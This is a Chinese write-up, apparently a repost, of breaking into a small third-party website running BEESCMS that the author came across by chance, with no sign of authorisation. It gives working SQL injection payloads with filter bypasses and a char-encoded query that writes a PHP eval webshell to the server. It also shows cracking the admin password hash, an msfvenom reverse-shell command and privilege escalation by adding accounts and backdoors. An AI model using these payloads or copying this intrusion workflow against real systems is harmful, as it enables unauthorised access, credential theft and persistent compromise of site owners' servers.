亚洲精品久久久久久久久久久,亚洲国产精品一区二区制服,亚洲精品午夜精品,国产成人精品综合在线观看,最近2019中文字幕一页二页

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評(píng)論與回復(fù)
登錄后你可以
  • 下載海量資料
  • 學(xué)習(xí)在線課程
  • 觀看技術(shù)視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會(huì)員中心
創(chuàng)作中心

完善資料讓更多小伙伴認(rèn)識(shí)你,還能領(lǐng)取20積分哦,立即完善>

3天內(nèi)不再提示

記錄某一次無(wú)意點(diǎn)開(kāi)的一個(gè)小網(wǎng)站的滲透過(guò)程

工程師鄧生 ? 來(lái)源:CSDN ? 作者:Deilty ? 2022-09-09 09:09 ? 次閱讀
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

記錄某一次無(wú)意點(diǎn)開(kāi)的一個(gè)小網(wǎng)站的滲透過(guò)程,幸運(yùn)的是搭建平臺(tái)是phpstudy,cms是beecms,beecms有通用漏洞,然后去網(wǎng)上找了資料,成功getshell并獲取服務(wù)器權(quán)限。

一、滲透過(guò)程

無(wú)意點(diǎn)開(kāi)一個(gè)網(wǎng)站,發(fā)現(xiàn)網(wǎng)站比較小,且看起來(lái)比較老,然后發(fā)現(xiàn)logo沒(méi)有改,于是乎去百度搜索這個(gè)cms,發(fā)現(xiàn)有通用漏洞,Beecms 通用漏洞

9f54549e-2fd7-11ed-ba43-dac502259ad0.png

這里運(yùn)氣比較好,沒(méi)有更改后臺(tái)地址,還是默認(rèn)地址/admin/login.php

a01ba2a6-2fd7-11ed-ba43-dac502259ad0.png

通過(guò)通用漏洞發(fā)先后臺(tái)管理處存在sql注入漏洞,直接輸入admin’,然后就會(huì)報(bào)錯(cuò),這里用萬(wàn)能密碼不能登陸,看來(lái)還是得通過(guò)上面得通用漏洞來(lái)進(jìn)行注入

a10710ba-2fd7-11ed-ba43-dac502259ad0.png

可以看到輸入payload后,頁(yè)面返回正常,從而可以判斷有sql注入,這里采用雙寫進(jìn)行繞過(guò)a159dd9a-2fd7-11ed-ba43-dac502259ad0.png

發(fā)現(xiàn)這個(gè)注入點(diǎn)后,就有各種各樣的注入方式了,通過(guò)sql語(yǔ)句寫入一句話,sqlmap一把梭,手工注入得到賬號(hào)密碼等等,怎么方便怎么來(lái),這里我把幾種方法都寫一下,看看那種方法可以

方法一

1.通過(guò)post抓包sqlmap一把梭,dump出管理員賬號(hào)密碼,進(jìn)后臺(tái)找上傳點(diǎn)

2.一把梭,發(fā)現(xiàn)并沒(méi)有,使用腳本也沒(méi)有繞過(guò)

a17de23a-2fd7-11ed-ba43-dac502259ad0.png

方法二

1.通過(guò)burp抓包,寫入一句話,payload:admin%27 un union ion selselectect 1,2,3,4, into outfile 'xm.php'#,發(fā)現(xiàn)寫入失敗,前面講到有防護(hù),這里通過(guò)hex編碼或者char函數(shù)繞過(guò)

a387b84e-2fd7-11ed-ba43-dac502259ad0.png

2.對(duì)shell部分進(jìn)行編碼

a3a64f52-2fd7-11ed-ba43-dac502259ad0.png

3.寫入shell的payload為:注意:記得在編碼轉(zhuǎn)換的時(shí)候前面加0x或者直接用unhex函數(shù),但是本次實(shí)驗(yàn)用unhex函數(shù)一直失敗,所以在前面加0x,看到可以寫入成功。

ps:這里的寫入路徑純屬盲猜,運(yùn)氣好,默認(rèn)目錄

a3e19148-2fd7-11ed-ba43-dac502259ad0.png

4.用蟻劍連接,成功連接,至此getshell完畢,下來(lái)就是后滲透階段,后面會(huì)講

a4177cea-2fd7-11ed-ba43-dac502259ad0.png

char函數(shù)繞過(guò):mysql內(nèi)置函數(shù)char()可以將里面的ascii碼轉(zhuǎn)換為字符串,payload為:admin' uni union on selselectect null,null,null,null,char(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 99, 109, 100, 93, 41, 59, 63, 62) in into outoutfilefile 'C:/phpStudy/WWW/beescms/cmd.php'#

a44b1302-2fd7-11ed-ba43-dac502259ad0.png

一樣成功寫入

1.寫入成功后,菜刀可以連接,我們?cè)L問(wèn)寫入的文件,驚奇的發(fā)現(xiàn)竟然有admin,和一串md5碼,大膽猜測(cè)可能是后臺(tái)賬號(hào)和密碼,試一下

a49a1e7a-2fd7-11ed-ba43-dac502259ad0.png

2.md5解密,wocao,成功登陸,然后就是后臺(tái)找上傳了

a4b97c34-2fd7-11ed-ba43-dac502259ad0.png

二、后滲透

通過(guò)whoami查看權(quán)限,發(fā)現(xiàn)是admin權(quán)限,但是不是最高權(quán)限,我們要提到最高權(quán)限去

a4db327a-2fd7-11ed-ba43-dac502259ad0.png

方法一

1.通過(guò)msf生成木馬提權(quán),payload:msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -f exe X > shell.exe

2.通過(guò)蟻劍上傳木馬,并執(zhí)行。執(zhí)行之前打開(kāi)msf使用模塊use exploit/multi/handler,設(shè)置相應(yīng)參數(shù),然后開(kāi)始監(jiān)聽(tīng)

a4fcc3cc-2fd7-11ed-ba43-dac502259ad0.png

3.不知道什么問(wèn)題,用這個(gè)沒(méi)有成功,那么只能通過(guò)大馬提權(quán)了

方法二

1.上傳大馬,此處應(yīng)該有狗或者盾之類的,用的免殺,成功上傳

2.訪問(wèn)大馬

a5226096-2fd7-11ed-ba43-dac502259ad0.png

3.這里提權(quán)方式很多,就不細(xì)說(shuō)了,有大馬之后很多操作都可以引刃而解了,開(kāi)放端口,添加賬號(hào),留后門。。等等

4.創(chuàng)建admin權(quán)限賬號(hào)之后,登陸服務(wù)器

a569434e-2fd7-11ed-ba43-dac502259ad0.png

三、一些其他的發(fā)現(xiàn)

通過(guò)掃描目錄,還發(fā)現(xiàn)有phpmyadmin,可以爆破,這里我試了下竟然是弱口令,都是root,但是連接不上,只能通過(guò)phpmyadmin登陸,發(fā)現(xiàn)是低版本的phpstudy搭建的,這里就可以另一種思路,利用日志文件寫入一句話getshell

a5f611de-2fd7-11ed-ba43-dac502259ad0.png

四、總結(jié) 1.前臺(tái)sql注入獲取用戶名密碼,進(jìn)入后臺(tái)找上傳 2.SQL注入語(yǔ)句寫入一句話 3.phpmyadmin一句話getshell 4.上傳大馬提權(quán)

至此,滲透結(jié)束。


審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點(diǎn)僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場(chǎng)。文章及其配圖僅供工程師學(xué)習(xí)之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問(wèn)題,請(qǐng)聯(lián)系本站處理。 舉報(bào)投訴
  • SQL
    SQL
    +關(guān)注

    關(guān)注

    1

    文章

    789

    瀏覽量

    46211
  • 編碼
    +關(guān)注

    關(guān)注

    6

    文章

    1000

    瀏覽量

    56568
  • ASCII
    +關(guān)注

    關(guān)注

    5

    文章

    172

    瀏覽量

    36418

原文標(biāo)題:實(shí)戰(zhàn) | 一次小網(wǎng)站滲透過(guò)程

文章出處:【微信號(hào):菜鳥(niǎo)學(xué)信安,微信公眾號(hào):菜鳥(niǎo)學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。

收藏 人收藏
加入交流群
微信小助手二維碼

掃碼添加小助手

加入工程師交流群

    評(píng)論

    相關(guān)推薦
    熱點(diǎn)推薦

    固定式測(cè)斜儀多久需要校準(zhǔn)一次?

    多數(shù)工程環(huán)境下,固定式測(cè)斜儀應(yīng)每12個(gè)月進(jìn)行一次全面校準(zhǔn)。對(duì)于滑坡體監(jiān)測(cè)、深基坑等高危場(chǎng)景,因位移數(shù)據(jù)直接影響預(yù)警決策,建議縮短至每6個(gè)月校準(zhǔn)一次。新設(shè)備首次安裝
    的頭像 發(fā)表于 08-13 14:47 ?511次閱讀
    固定式測(cè)斜儀多久需要校準(zhǔn)<b class='flag-5'>一次</b>?

    adxl355讀數(shù)異常,三軸中某一軸數(shù)據(jù)始終為0怎么解決?

    adxl355芯片,我這邊做了批設(shè)備,開(kāi)始全部工作正常,后續(xù)有一次經(jīng)拆裝后,個(gè)別出現(xiàn)了三軸中某一軸讀數(shù)全為0的情況,其余兩軸讀數(shù)正常(還有一個(gè)
    發(fā)表于 08-13 07:32

    智能客服驅(qū)動(dòng)效率和體驗(yàn)升級(jí),上海電信+昇騰AI的一次民生應(yīng)用實(shí)踐

    上海電信+昇騰AI的一次民生應(yīng)用實(shí)踐
    的頭像 發(fā)表于 07-30 23:44 ?2570次閱讀
    智能客服驅(qū)動(dòng)效率和體驗(yàn)升級(jí),上海電信+昇騰AI的<b class='flag-5'>一次</b>民生應(yīng)用實(shí)踐

    移動(dòng)電源EMC整改:認(rèn)證失敗到一次通過(guò)的實(shí)戰(zhàn)經(jīng)驗(yàn)

    深圳南柯電子|移動(dòng)電源EMC整改:認(rèn)證失敗到一次通過(guò)的實(shí)戰(zhàn)經(jīng)驗(yàn)
    的頭像 發(fā)表于 05-26 11:25 ?508次閱讀
    移動(dòng)電源EMC整改:認(rèn)證失敗到<b class='flag-5'>一次</b>通過(guò)的實(shí)戰(zhàn)經(jīng)驗(yàn)

    充電樁EMC整改:測(cè)試失敗到一次過(guò)檢的標(biāo)準(zhǔn)化流程設(shè)計(jì)

    南柯電子|充電樁EMC整改:測(cè)試失敗到一次過(guò)檢的標(biāo)準(zhǔn)化流程設(shè)計(jì)
    的頭像 發(fā)表于 05-09 11:19 ?665次閱讀

    一次消諧裝置與二消諧裝置區(qū)別、一次消諧器與二消諧器的區(qū)別

    一次消諧器與二消諧器是電力系統(tǒng)中用于抑制諧振過(guò)電壓的不同裝置,主要區(qū)別如下: 安裝位置:一次消諧器串聯(lián)于電壓互感器(PT)一次側(cè)中性點(diǎn)與地之間,直接承受高電壓;二
    的頭像 發(fā)表于 05-07 09:58 ?2777次閱讀
    <b class='flag-5'>一次</b>消諧裝置與二<b class='flag-5'>次</b>消諧裝置區(qū)別、<b class='flag-5'>一次</b>消諧器與二<b class='flag-5'>次</b>消諧器的區(qū)別

    一次性使用心電電極片性能測(cè)試 深圳測(cè)

    一次性使用心電電極片性能測(cè)試 :YICE0196 心電電極電性能測(cè)試儀、 心電電極電性能測(cè)試儀(SEAM) 心電電極性能測(cè)試儀
    的頭像 發(fā)表于 03-19 11:27 ?937次閱讀
    <b class='flag-5'>一次</b>性使用心電電極片性能測(cè)試 深圳<b class='flag-5'>一</b>測(cè)

    請(qǐng)問(wèn)dlp4500選擇play once點(diǎn)擊play是每點(diǎn)擊一次個(gè)循環(huán)嗎?

    dlp4500選擇play once點(diǎn)擊play是每點(diǎn)擊一次個(gè)循環(huán)嗎?
    發(fā)表于 02-28 08:42

    請(qǐng)問(wèn)DLP9000是沒(méi)有VIDEO模式只能5個(gè)圖片一次的load嗎?

    你好,想問(wèn)DLP9000是沒(méi)有VIDEO模式只能5個(gè)圖片一次的load嗎 以及您能看出這個(gè)DMD是啥型號(hào)的嗎 謝謝
    發(fā)表于 02-25 06:04

    歐度MEDI-SNAP一次性醫(yī)用插頭發(fā)布

    歐度MEDI-SNAP一次性醫(yī)用插頭產(chǎn)品組加入新成員啦!為滿足一次性內(nèi)窺鏡、一次性手術(shù)消融刀等設(shè)備中的耗材需求,歐度將ODU MEDI-SNAP一次性醫(yī)用插頭的鎖定方式擴(kuò)展為插拔自鎖和
    的頭像 發(fā)表于 02-21 16:00 ?806次閱讀

    一次消諧裝置的用處以及工作原理詳解

    一次消諧裝置的用處以及工作原理詳解 ??? 如果6-35kV電網(wǎng)的中性點(diǎn)未接地,則連接到母線上Y0的PT初級(jí)繞組將成為電網(wǎng)接地的金屬通道,并且電網(wǎng)對(duì)地電容將具有個(gè)通過(guò)PT初級(jí)繞組進(jìn)行充電和放電
    的頭像 發(fā)表于 02-10 14:17 ?1287次閱讀

    ads8568采集基本正常,但可能在某一次上電后,出現(xiàn)不工作的狀態(tài),為什么?

    現(xiàn)在遇到這樣問(wèn)題:ads8568采集基本正常,但可能在某一次上電后,出現(xiàn)不工作的狀態(tài)(busy為高),必須重新上電才能正常,CONVST、RD、CS等輸入正常 說(shuō)明:此AD芯片掛在fpga上,供電電壓HVDD和HVSS連接+5v,-5v,與模擬電壓共用 DVDD:+3.3v 數(shù)字
    發(fā)表于 02-06 08:00

    一次性鋰電池為什么不能充電?文講清!

    一次性鋰電池不能充電,是由它的正負(fù)極材料、電解液等決定的。雖然它不能充電,但在某些場(chǎng)景下,還是有著不可替代的作用。希望通過(guò)這篇文章,能讓大家對(duì)一次性鋰電池有更深入的了解,以后在生活中使用的時(shí)候,也能更安全、更環(huán)保。
    的頭像 發(fā)表于 01-23 14:11 ?2186次閱讀
    <b class='flag-5'>一次</b>性鋰電池為什么不能充電?<b class='flag-5'>一</b>文講清!

    TCP三握手的詳細(xì)過(guò)程

    是TCP三握手的詳細(xì)過(guò)程: 1. 第一次握手:SYN(同步序列編號(hào)) 客戶端 :客戶端準(zhǔn)備發(fā)起個(gè)TCP連接,并向服務(wù)器發(fā)送
    的頭像 發(fā)表于 01-03 17:11 ?1697次閱讀

    調(diào)試ADS1278,讀取數(shù)據(jù)過(guò)程中在下一次SYNC低脈沖信號(hào)前出現(xiàn)反復(fù)進(jìn)入中斷的現(xiàn)象,請(qǐng)問(wèn)是否正確?

    準(zhǔn)備檢索變?yōu)榈?,我控制在DRDY下降沿進(jìn)入中斷讀取數(shù)據(jù)(僅讀取通道1),但是讀取數(shù)據(jù)過(guò)程中在下一次SYNC低脈沖信號(hào)前出現(xiàn)反復(fù)進(jìn)入中斷的現(xiàn)象,請(qǐng)問(wèn)是否正確?在時(shí)序上還有什么問(wèn)題嗎? 黃色SCLK波形
    發(fā)表于 12-25 07:03